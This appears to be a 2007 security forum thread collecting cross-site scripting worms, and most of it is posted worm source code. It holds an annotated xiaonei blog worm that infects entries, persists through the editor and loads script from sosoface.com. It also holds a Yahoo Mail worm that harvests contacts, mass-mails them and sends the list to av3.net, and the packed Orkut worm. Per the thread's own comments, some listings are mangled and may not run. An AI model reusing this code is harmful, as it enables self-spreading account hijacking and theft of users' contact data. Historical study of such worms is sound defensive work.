List of XSS Worms?
Posted by: sirdarckcat
Date: August 08, 2007 06:22PM

Hi!

Do you guys know of any other XSS worms besides these:

MySpace.com Sammy's Worm http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Libero.it, Tiscali.it, Lycos.it, Excite.com Nduja Worm http://ha.ckers.org/blog/20070709/nduja-cross-domainwebmail-xss-worm/
Orkut xmen.js Worm http://www.memestreams.net/users/acidus/blogid10169775/
Yahoo! Yamanner Worm http://www.theregister.co.uk/2006/06/12/javscript_worm_targets_yahoo/

And do you have the code of the following Worms?
Orkut xmen.js Worm http://www.memestreams.net/users/acidus/blogid10169775/
Yahoo! Yamanner Worm http://www.theregister.co.uk/2006/06/12/javscript_worm_targets_yahoo/

Any help will be appreciated :)

Greetz!!



Edited 1 time(s). Last edit at 08/08/2007 06:25PM by sirdarckcat.

Re: List of XSS Worms?
Posted by: Super-Friez
Date: August 08, 2007 09:16PM

http://www.xssed.com/

There's a list!

Re: List of XSS Worms?
Posted by: Anonymous User
Date: August 09, 2007 06:09PM

@Super-Friez

http://en.wikipedia.org/wiki/Computer_worm

Re: List of XSS Worms?
Posted by: Super-Friez
Date: August 09, 2007 06:40PM

Oops, sorry. I'm still relatively new here.

Re: List of XSS Worms?
Posted by: monyer
Date: November 06, 2007 08:40PM

A site named xiaonei had one!
// Worm state shared by the XHR callbacks below (flat script, all globals).
var req = null;            // the in-flight XMLHttpRequest / ActiveX request, created in loadUrl()
var step=null;             // state-machine label consumed by processReqChange() and GetStatus()
var DiaryMonthUrlList="",DiaryUrlList="";   // "|"-separated work queues: monthly-archive URLs, then entry edit URLs
var timer=null;            // setInterval handle driving GetStatus()
var bIsBusy=false;         // true while a request is outstanding

// Obfuscated payload: "."-separated byte values that MyDecode() is meant to XOR with 0x12
// to recover the markup that gets prepended to each edited entry (see processReqChange()).
// Kept encoded here so the literal markup never appears as plain text in the stored entry.
var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35.33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103.96.126.58.100.112.97.113.96.123.98.102.40.119.106.119.113.103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127.123.61.127.125.113.60.119.113.115.116.125.97.125.97.60.101.101.101.61.61.40.98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.126.87.119.102.115.119.96.113.60.102.124.119.127.103.113.125.118.47.97.50.102.119.97.48.59.59.50.59.53.44.46.61.115.44";

// Intended to turn the HTML-entity-encoded entry body (as served in the edit form) back
// into raw markup before the payload is prepended and the entry is re-submitted.
// NOTE: as pasted, this listing has been mangled by the forum rendering -- the entity
// names on the left-hand side were already decoded, so most of these replace() calls
// now map a character to itself.  Treat it as documentation of intent, not runnable code.
function my_HtmlDecode(str)
{
str=str.replace(/</g,"<");
str=str.replace(/>/g,">");
str=str.replace(/&/g,"&");
str=str.replace(/ /g," ");
str=str.replace(/"/g,"\"");
str=str.replace(/<br>/g,"\n");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,"\"");
str=str.replace(/'/g,"'");
str=str.replace(/#/g,"#");
str=str.replace(/(/g,"(");
str=str.replace(/)/g,")");
str=str.replace(/"/g,"\"");
str=str.replace(/'/g,"'");
return str;
}
// XHR completion handler shared by every request loadUrl() issues.  It is a state machine
// keyed on the global `step`; each branch screen-scrapes the victim's own (same-origin)
// blog pages out of req.responseText with indexOf/substring and then advances the state:
//   WriteIframe       -> from a profile page, find the first GetEntry.do link and load it in
//                        a hidden iframe so a copy of the worm runs on blog.xiaonei.com
//   GetDiaryMonthList -> collect the monthly-archive links into DiaryMonthUrlList
//   GetDiaryList      -> collect up to five EditEntry.do links into DiaryUrlList
//   GetDiaryText      -> read one entry's edit form, prepend the payload, POST it back
//   EditDiaryText     -> edit accepted; return to GetDiaryText for the next entry
// Everything runs with the victim's ambient session, which is what turns a stored XSS in
// an entry body into a self-propagating worm.  The defensive control is server-side
// sanitising of the stored entry HTML (the payload rides in the multipart "body" field).
function processReqChange()
{
if (req.readyState == 4 && req.status == 200 )
{
if("WriteIframe"==step)
{
var text,len,i=0,j=0,temp;

text=req.responseText;
// Locate the first entry link inside the profile page's <div class="article"> block.
i=text.indexOf("<div class=\"article\">",0);
if(-1==i){return}
i=text.indexOf("http://blog.xiaonei.com/GetEntry.do",i);
if(-1==i){return}
j=text.indexOf("\"",i);
if(-1==j){return}
text=text.substring(i,j);

// Load that entry in a 1x0 hidden iframe placed next to the payload anchor (#mya113).
// The iframe document is on blog.xiaonei.com, so the worm copy embedded in the entry
// runs there and can reach the edit endpoints by same-origin XHR (see Start()).
document.getElementById("mya113").style.background="#FFFFFF";
var s=document.createElement("iframe");
s.frameborder="0";
s.height="0";
s.width="1";
s.src=text;
document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));
}
else if("GetDiaryMonthList"==step)
{
var text,len,i=0,j=0,temp;
// `text` is the same page the user gets by clicking "My Blog"; parse the HTML, take every
// link in the "Blog archive" box and save it into DiaryMonthUrlList.
// Then hand over to GetStatus(); with step="GetDiaryList" it fetches each month's entry list.
text=req.responseText;
i=text.indexOf("<div id=\"list-archive\">",0);
if(-1==i){return}
j=text.indexOf("<div class=\"bottom-box\">",i);
if(-1==j){return}
text=text.substring(i,j);

i=j=0;
while(1)
{
i=text.indexOf("http://blog.xiaonei.com/MyBlog.do",i);
if(-1==i)break;
j=text.indexOf("'>",i);
if(-1==j)break;
temp=text.substring(i,j);
i+=temp.length;
temp=my_HtmlDecode(temp)+"|";
DiaryMonthUrlList+=temp;
}
if(DiaryMonthUrlList.length<=1)
{
return;
}

// Start the one-second pump; GetStatus() pops one archive URL per tick.
step="GetDiaryList";
req=null;
bIsBusy=false;
timer=window.setInterval(GetStatus,1000);
}
else if("GetDiaryList"==step)
{
var text,len,i,j,temp,temp2;
var text2="http://blog.xiaonei.com/EditEntry.do?id=";

// `text` is the same page the user gets after clicking a month in "Blog archive".
// Parse the HTML to get that month's entry list and save it in DiaryUrlList; afterwards
// step=GetDiaryText fetches each entry's content -- see the
// else if("GetDiaryText"==step) branch further down in this function.
text=req.responseText;

len=text.length;
i=text.indexOf("<div id=\"list-article\">");
if(-1==i)
{
req=null;
bIsBusy=false;
return;
}
j=text.indexOf("</table>",i);
if(-1==j)
{
req=null;
bIsBusy=false;
return;
}
text=text.substring(i,j);
i=j=0;


while(1)
{
// Count the "|" separators already in DiaryUrlList, i.e. how many entries are queued.
j=0;
len=0;
j=DiaryUrlList.indexOf("|",j);
while(j!=-1)
{
j++;
len++;
j=DiaryUrlList.indexOf("|",j);
}

if(len>=5)// only the first 5 entries (or 4 -- the poster did not check carefully) are targeted
{
break;
}

i=text.indexOf(text2,i);
if(-1==i)
{
break;
}
i+=text2.length;
j=text.indexOf("\">",i);
if(-1==j || j-i>10)
{
break;
}
temp=text2+text.substring(i,j)+"|";
DiaryUrlList+=temp;
}
req=null;
bIsBusy=false;
}
else if("GetDiaryText"==step)
{
var text,len,i,j;
var argv;
var title,body,blog_pic_id="0",pic_path,blogControl,Diaryid;


text=req.responseText;
// This branch mimics the user editing an entry and prepends the following anchor to every
// entry (reversed VBScript in a style URL: when evaluated it inserts a <script> element
// loading the worm from the sosoface.com host, and #mya113 is the marker the rest of the
// worm anchors on):
//<a name="mya113" id="mya113" style='background:url(vbscript:execute(StrReverse(")""311aym""(dIyBtnemelEteg.tnemucod,s erofeBtresni.edoNtnerap.)""311aym""(dIyBtnemelEteg.tnemucod :""gpj.sjnx/segami/moc.ecafosos.www//:ptth""=crs.s:)""tpircs""(tnemelEetaerc.tnemucod=s tes")) )'>

// Isolate the edit form.  The added offsets below are the lengths of the marker strings
// that were just searched for.
i=text.indexOf("<form action=\"http://upload.xiaonei.com/EditEntry.do\"",0);

if(-1==i)
{
return;
}
i+=53;

j=text.indexOf("</form>",i);
if(-1==j)
{
return;
}

text=text.substring(i,j);
//------------------------

i=text.indexOf("id=\"title\" class=\"inputtext\" tabindex=\"1\" value=\"",0);
if(-1==i)return;
i+=49;
j=text.indexOf("\" />",i);
if(-1==j)return;
title=text.substring(i,j);
//---
i=text.indexOf("<textarea name=\"body\" id=\"body\" cols=\"100%\" style=\"display:none\">",0);
if(-1==i)return;
i+=65;
j=text.indexOf("</textarea>",i);
if(-1==j)return;
body=text.substring(i,j);
//---
i=text.indexOf("id=\"blog_pic_id\" value=\"",0);
if(-1==i)return;
i+=24;
j=text.indexOf("\" />",i);
if(-1==j)return;
blog_pic_id=text.substring(i,j);
//---
i=text.indexOf("id=\"pic_path\" value=\"",0);
if(-1==i)return;
i+=21;
j=text.indexOf("\" />",i);
if(-1==j)return;
pic_path=text.substring(i,j);
//---
i=text.indexOf("name=\"id\" value=\"",0);
if(-1==i)return;
i+=17;
j=text.indexOf("\" />",i);
if(-1==j)return;
Diaryid=text.substring(i,j);
//---
// blogControl: the one- or two-character option value immediately preceding the
// selected="selected" marker (a leading quote is skipped).
i=text.indexOf("\" selected=\"selected\"",0);
if(-1==i)return;
j=i-2;
if(text.substr(j,1)=="\"")
j++;
blogControl=text.substring(j,i);


body=my_HtmlDecode(body);
if(body.indexOf("mya113",0)>=0)// already infected (marker present): do not infect again
{
req=null;
step="GetDiaryText";
bIsBusy=false;

return;
}
else
{
;
}
// Above: extraction of the entry's fields.
// Below: infect the entry and save the modification.

body=MyDecode(myrand)+body;
// Infect the entry by prepending the cross-site payload to the entry body.
// MyDecode(myrand) yields the key cross-site code; the author encoded it and stored it in
// the myrand variable -- the long string of numbers at the top of the program.

// Below: POST the modified entry back through the site's own edit endpoint.
// Hand-built multipart/form-data body; the boundary matches the Content-Type header set
// in loadUrl().  To the server this is indistinguishable from the user's own edit: same
// session cookies, same form fields.  No anti-CSRF field appears among the fields, and
// one would not have helped here anyway, since same-origin script could read it from the
// edit page it just fetched.
argv="\r\n";
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"title\"\r\n\r\n";
argv+=(title+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"body\"\r\n\r\n";
argv+=(body+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"theFile\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n";
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"blog_pic_id\"\r\n\r\n";
argv+=(blog_pic_id+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"pic_path\"\r\n\r\n";
argv+=(pic_path+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"blogControl\"\r\n\r\n";
argv+=(blogControl+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n";
argv+=(Diaryid+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"relative_optype\"\r\n\r\n";
argv+=("publisher"+"\r\n");
argv+="-----------------------------7d71861cb014c\r\nContent-Disposition: form-data; name=\"del_relative_id\"\r\n\r\n\r\n";
argv+="-----------------------------7d71861cb014c--\r\n";


req=null;
step="EditDiaryText";
loadUrl("http://blog.xiaonei.com/EditEntry.do","POST",argv);


}
else if("EditDiaryText"==step)
{
// The edit was accepted; release the request slot so GetStatus() moves to the next entry.
req=null;
bIsBusy=false;
step="GetDiaryText";
}
else
{
;
}

}
}
// Recovers the payload text from myrand: splits the "."-separated byte values and XORs
// each with 0x12 before turning it back into characters -- a trivial obfuscation whose
// purpose is presumably to keep the literal markup out of the stored entry as plain text.
// NOTE: as pasted, the forum rendering appears to have dropped characters from this
// listing (compare my_HtmlDecode), so it should not be expected to run as-is.
function MyDecode(str)
{
var i,k,str2="";

k=str.split(".");

for(i=0;i<k.length;i++)
{
str2+=String.fromCharCode(k^0x12);
}
return str2;
}
// Thin XHR wrapper: creates (or reuses) the request object in the global `req`, wires
// processReqChange() as the completion handler and sends `argv` as the body.  A POST is
// sent as multipart/form-data with the fixed boundary that processReqChange()'s hand-built
// body uses (its part separators are "--" followed by this boundary).  Because the request
// is same-origin, the browser attaches the victim's session cookies automatically.
// Any failure leaves req === false with bIsBusy still true, which quietly stalls the
// GetStatus() pump instead of surfacing an error.
function loadUrl( url,method,argv )
{
bIsBusy=true;
if(!req)
{
if(window.XMLHttpRequest)
{
try
{
req = new XMLHttpRequest();
} catch(e) { req = false; }
}
else if(window.ActiveXObject)
{
// IE fallbacks, newest ProgID first.
try
{
req = new ActiveXObject('Msxml2.XMLHTTP');
}
catch(e)
{
try
{
req = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) { req = false; }
}
}
}
if(req)
{
req.onreadystatechange = processReqChange;
try
{
req.open(method, url, true);
if(method=="POST")
req.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7d71861cb014c");
req.send(argv);
}catch(e)
{
req=false;
}
}
}
// Pump called once a second by the interval timer started in processReqChange().  While
// no request is in flight it pops the next "|"-separated URL from the current queue and
// fetches it: on GetDiaryList it drains the monthly-archive list, on GetDiaryText the
// entry list, clearing the timer once the entry list is exhausted.
function GetStatus()
{
if(bIsBusy)return;

if("GetDiaryList"==step)
{
var DiaryMonthUrl,i;

// Fetch each month's entry list.
if(DiaryMonthUrlList.length<=1)
{
step="GetDiaryText";
return;
}
i=DiaryMonthUrlList.indexOf("|",0);
if(-1==1)
{
// (Always false as written; the length check above is what actually ends the queue.)
step="GetDiaryText";
return;
}
DiaryMonthUrl=DiaryMonthUrlList.substring(0,i);
DiaryMonthUrlList=DiaryMonthUrlList.substring(i+1,DiaryMonthUrlList.length);

// Back to processReqChange() at the top; step is still GetDiaryList.
loadUrl(DiaryMonthUrl,"GET","");

}
else if("GetDiaryText"==step)
{
var DiaryUrl,i;
if(DiaryUrlList.length<=1)
{
clearInterval(timer);
return;
}

i=DiaryUrlList.indexOf("|",0);
if(-1==i)
{
clearInterval(timer);
return;
}

DiaryUrl=DiaryUrlList.substring(0,i);
DiaryUrlList=DiaryUrlList.substring(i+1,DiaryUrlList.length);

loadUrl(DiaryUrl,"GET","");
}
}
// Beacon: drops a 0x0 hidden iframe that loads an image URL on a third-party host, placed
// next to the payload anchor (#mya113).  The poster's note in Start() says this is visitor
// counting via the cnzz webmaster tool.  From the defender's side, hidden iframes to
// off-site hosts injected next to user content are a detectable artefact: auditing stored
// markup for iframes, or restricting which origins may be framed, would surface this.
function WriteStat()
{
var s=document.createElement("iframe");
s.frameborder="0";
s.height="0";
s.width="0";
s.src="http://www.sosoface.com/images/stat.jpg";
document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));

}

// Drops everything up to and including the first "</A>" in `html` and returns the rest;
// `html` is returned unchanged when there is no "</A>".  EditorSubmit() applies it to the
// entry body so that the previously inserted payload anchor is removed before a fresh copy
// is prepended -- presumably so that saving an infected entry does not stack copies.
function DeleteScript(html)
{
var i=0,j=0,str;

str=html;

i=str.indexOf("</A>",0);
if(-1==i)
return str;
i+=4;
str=str.substring(i,str.length);

return str;
}
// Installed by Start() as the onsubmit handler of the blog editor form (reached via
// parent.parent because the script runs inside the editor's win.htm frame).  It calls
// what appear to be the page's own pre-submit hooks, then rewrites the "body" field so the
// saved entry still starts with the decoded payload.  This is the persistence half of the
// worm: a victim who edits an infected entry cannot clean it by hand through the site's
// editor, because the payload is re-inserted on submit.
function EditorSubmit()
{
var ret=false;
parent.parent.descOptype();
ret=parent.parent.beforeSubmit();

parent.parent.document.getElementById("body").value=MyDecode(myrand)+DeleteScript(parent.parent.document.getElementById("body").value);

return ret;
}
// Entry point: decides what to do from document.domain and document.location.
//   blog.xiaonei.com + editor frame -> hook the editor form (persistence, see EditorSubmit)
//   blog.xiaonei.com elsewhere      -> beacon, then start crawling and infecting entries
//   xiaonei.com / www.xiaonei.com   -> profile page: fetch it and open an entry in an
//                                      iframe so the worm reaches the blog origin
function Start()
{
// Check that we are on the blog.xiaonei.com domain; ajax cannot cross domains, so this
// check is required.
if("blog.xiaonei.com"==document.domain)
{
// If the infected entry is being edited, it does something odd that the poster could not
// follow -- it appears to rewrite itself; the reason was unclear to them.
if("http://blog.xiaonei.com/pages/editor/win.htm"==document.location)
{
parent.parent.document.getElementById("editorForm").onsubmit=EditorSubmit;
}
else
{

WriteStat();// visitor-counting function, using the cnzz webmaster tool
// Infection starts below.  Step one, GetDiaryMonthList, gets the entries' monthly archive.
step="GetDiaryMonthList";
loadUrl("http://blog.xiaonei.com/MyBlog.do","GET","");// loadUrl reads page content by ajax
// Control continues in processReqChange() at the top.
}
}
else if("xiaonei.com"==document.domain || "www.xiaonei.com"==document.domain)
{
// Not on the blog.xiaonei.com domain: write an iframe whose src is an entry URL.  That URL
// is on blog.xiaonei.com, so this indirectly achieves the cross-domain hop; the author
// presumably did this so that merely visiting someone's profile page is enough to infect.
var url="";

url=document.location.toString();
if(url.indexOf("&")==-1)
return;
step="WriteIframe";
loadUrl(url,"GET","");
}
}

// Runs as soon as the injected script is evaluated on the page.
Start();

**********************************************************************************************
Chinese Blog:http://hi.baidu.com/monyer/
English Blog:http://monyer.blogspot.com/
WebSite:http://monyer.cn/
Don't trouble troubles till trouble troubles you!

Re: List of XSS Worms?
Posted by: rsnake
Date: November 11, 2007 01:56PM

@sirdarckcat, here are a few more. There are more but some of the code has been nuked for various reasons. These are all still intact.

U-dominion.com: http://ha.ckers.org/blog/20070110/u-dominioncom-xss-worm/
Gaiaonline.com: http://ha.ckers.org/blog/20070104/semi-reflective-xss-worm-hits-gaiaonlinecom/
MyYearbook.com: http://ha.ckers.org/blog/20060705/full-disclosure-extortion-of-myyearbookcom/

- RSnake
Gotta love it. http://ha.ckers.org

Re: List of XSS Worms?
Posted by: Kyran
Date: November 11, 2007 06:06PM

Here is a link to a slightly more advanced version of that first Gaiaonline.com worm. http://www.xssed.com/article/1/Paper_Anatomy_of_a_Pseudo-Reflective_Worm/

The code is still available at the link near the bottom of the paper.

In retrospect, these were amazingly simple.

- Kyran

Re: List of XSS Worms?
Posted by: hackathology
Date: November 18, 2007 09:51AM

Wow, those worms are really amazing. They are killing those sites' reputations.

http://hackathology.blogspot.com

Re: List of XSS Worms?
Posted by: rsnake
Date: November 20, 2007 05:34PM

Here is one of the Yahoo worms. Not sure if this is Yamanner or another one:

<div class="msgarea"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" target>= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf('@...', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 0) > 0 ) IDList = IDList + ',' + YahooID ; StartString = ''; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ' <td>'; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i&#43;+; } if(IDList.substr(0,1) == ',') IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(',', 0)>0 ) { IDListArray = IDList.split(','); Email = IDListArray[0]; IDList = IDList.replace(Email + ',', ''); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, '');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = IDList.replace(UserEmail, ''); return IDList; } function ListContacts() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest('http://us.' 
+ Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', null); } } } function ExtractStr(HtmlContent) { StartString = 'name=\u0022.crumb\u0022 value=\u0022'; EndString = '\u0022'; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = 'this is test'; MySubj = 'New Graphic Site'; Url = 'http://us.' + Server + '.mail.yahoo.com/ym/Compose'; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc' ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf('?box=' ,0);AIndex = ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = 
'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A&#43;forwarded&#43;message&#43;attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save&#43;as&#43;a&#43;Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A&#43;forwarded&#43;message&#43;attached.&Format=html&sendbottom=Send&savedraftbottom=Save&#43;as&#43;a&#43;Draft&cancelbottom=Cancel&cancelbottom=Cancel'; Param = Param.replace('BOXNAME', BoxName); Param = Param.replace('RUMBVAL', CRumb); Param = Param.replace('BCCLIST', IDList); Param = Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL', 'av3@...'); Param = Param.replace('EMAILBODY', MyBody); Param = Param.replace('PlainMESSAGE', ''); Param = Param.replace('EMAILSUBJ', MySubj);Param= Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj); Param = Param.replace('EMAILMID', MyMid);Param = Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST', Param); } }} function alertContents() { if (http_request.readyState == 4) { 
window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=' + IDList) } } makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)">Please wait while loading the site</td><br><br> </div>

- RSnake
Gotta love it. http://ha.ckers.org

Re: List of XSS Worms?
Posted by: rsnake
Date: December 19, 2007 10:23AM

The Orkut XSS worm code: http://antrix.net/journal/techtalk/orkut_xss.html

// Decoder for Dean Edwards-style "packed" JavaScript.  The packed source `p` contains
// base-`a` word tokens; the first `c` entries of the word list `k` are the original
// identifiers, and every token is replaced by whole-word regex substitution.
// This is the generic unpacker, not worm-specific: the post below shows its output for
// the blob that follows.  `e` and `d` are scratch parameters (encoder and dictionary).
function $(p,a,c,k,e,d) {
  // Encode a number as a base-`a` token: 0-9a-z for values below 36, higher
  // code points above that, recursing on the quotient for multi-digit values.
  e=function(c) {
    var prefix = c<a ? "" : e(parseInt(c/a));
    c = c%a;
    var digit = c>35 ? String.fromCharCode(c+29) : c.toString(36);
    return prefix + digit;
  };
  // Dictionary mode: map every token to its word (or back to itself when the
  // word slot is empty), then collapse the search into a single \w+ pass.
  var useDictionary = !''.replace(/^/,String);
  if (useDictionary) {
    for (var idx = c - 1; idx >= 0; idx--) {
      d[e(idx)] = k[idx] || e(idx);
    }
    k = [function(word){return d[word]}];
    e = function(){return'\\w+'};
    c = 1;
  }
  for (var slot = c - 1; slot >= 0; slot--) {
    if (k[slot]) {
      p = p.replace(new RegExp('\\b'+e(slot)+'\\b','g'), k[slot]);
    }
  }
  return p;
}
// Packed form of the Orkut worm: the $() unpacker above rebuilds the source from this
// token string and the '|'-separated word list, and setTimeout evaluates the result after
// 1 ms.  The decoded listing is given in the next post; note from a defender's side that
// packing like this defeats simple keyword matching on stored content, so filtering must
// act on the markup/attribute level (here the scrap's <embed> attributes), not on strings.
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
// Attribution line as posted (an implicit global, not part of the packed payload).
author="Rodrigo Lacerda"

- RSnake
Gotta love it. http://ha.ckers.org

